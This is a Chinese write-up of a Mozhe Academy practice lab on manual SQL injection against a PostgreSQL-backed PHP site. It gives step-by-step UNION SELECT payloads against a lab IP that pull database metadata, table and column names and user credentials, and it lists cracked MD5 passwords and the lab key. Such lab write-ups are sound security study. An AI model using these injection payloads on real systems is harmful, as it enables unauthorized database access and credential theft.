SQL手工注入漏洞测试(PostgreSQL数据库)-墨者

weoptions2023-12-07 23:49

---------靶场专栏---------

声明:文章由作者weoptions学习或练习过程中的步骤及思路,非正式答案,仅供学习和参考。

靶场背景:

来源:

墨者学院

简介:

安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+PostgreSQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

实训目标:

1.掌握SQL注入原理;

2.了解手工注入的方法;

3.了解PostgreSQL的数据结构;

4.了解字符串的MD5加解密;

解题方向:

手工进行SQL注入测试,获取管理密码登录。

解题思路:

postgreSQL和mysql语法和数据库结构上有区别,但整体思路区别不大。

还是熟悉的管理系统登陆界面,还是熟悉的平台停机维护通知。

解题步骤:

一、验证注入点

复制代码 
http://124.70.71.251:41459/new_list.php?id=1 and 1=1

页面显示正常

报错一下看看

复制代码 
http://124.70.71.251:41459/new_list.php?id=1 and 1=2

ok,那注入点就是在这里了。

二、order by猜列

确定了,四个字段。

三、测试回显

用select语句测一下回显。跟mysql有些不一样,postgreSQL是用null来测试回显点的。

复制代码 
http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,null,null

依次给每个null加上单引号。

复制代码 
http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,'null','null',null

第二个和第三个位置有回显,接下来进行注入。

四、数据库信息获取

version()数据库版本

复制代码 
http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,version(),null

PostgreSQL 9.5.13 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.9) 5.4.0 20160609, 64-bit

current_user数据库用户

复制代码 
http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,current_user,null

postgres

current_database()数据库名

复制代码 
http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,current_database(),null

mozhedvcms

五、查数据

①查数据库名

复制代码 
http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,string_agg(datname,','),null from pg_database

template1,template0,postgres,mozhedvcms

②查表名

复制代码 
http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,string_agg(tablename,','),null from pg_tables where schemaname='public'

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,string_agg(relname,','),null from pg_stat_user_tables

notice,reg_users

③查列名

复制代码 
http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'

id,name,password,status

④查数据

复制代码 
http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users

六、MD5解密登陆

(1)mozhe1,085631f437f337ecbb741d2d9bb73b7d(544041)

(2)mozhe2,1c63129ae9db9c60c3e8aa94d3e00495(1qaz2wsx)

mozhe1成功登陆,KEY:mozhe2cf8a74af7074d9688e835190f9

总结:

难度:★★☆☆☆☆☆☆☆☆

分析:

很难评价,直接就把不熟练写在了脸上了,而且原理还是很模糊。

相关推荐
hqxstudying1 小时前
MyBatis 和 MyBatis-Plus对比
java·数据库·mysql·mybatis
DarkAthena1 小时前
AI生成技术报告:GaussDB与openGauss的HTAP功能全面对比
数据库·gaussdb
DemonAvenger3 小时前
高效JOIN操作:多表关联查询技巧与实战经验分享
数据库·mysql·性能优化
小云数据库服务专线4 小时前
GaussDB 数据库架构师修炼(十八) SQL引擎-分布式计划
数据库·数据库架构·gaussdb
秋已杰爱5 小时前
Redis分布式锁
数据库·redis·分布式
烟锁池塘柳06 小时前
【R语言】R语言中 rbind() 与 merge() 的区别详解
sql·r语言
haogexiaole12 小时前
Redis优缺点
数据库·redis·缓存
在未来等你12 小时前
Redis面试精讲 Day 27:Redis 7.0/8.0新特性深度解析
数据库·redis·缓存·面试
新法国菜13 小时前
MySql知识梳理之DML语句
数据库·mysql
老华带你飞13 小时前
校园交友|基于SprinBoot+vue的校园交友网站(源码+数据库+文档)
java·数据库·vue.js·spring boot·论文·毕设·校园交友网站
热门推荐
01UV安装并设置国内源02KGG转MP3工具|非KGM文件|解密音频03【踩坑笔记】50系显卡适配的 PyTorch 安装04蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接05Claude Code VSCode集成开发指南:AI编程助手完整配置06突破百度网盘的下载限速,两种方法教会你【超详细】07【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)0820个国内外主流AI绘画工具大汇总(最新免费可用~)09UnityHub Validation Failed下载编辑器错误,添加模块报错的解决方案10Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code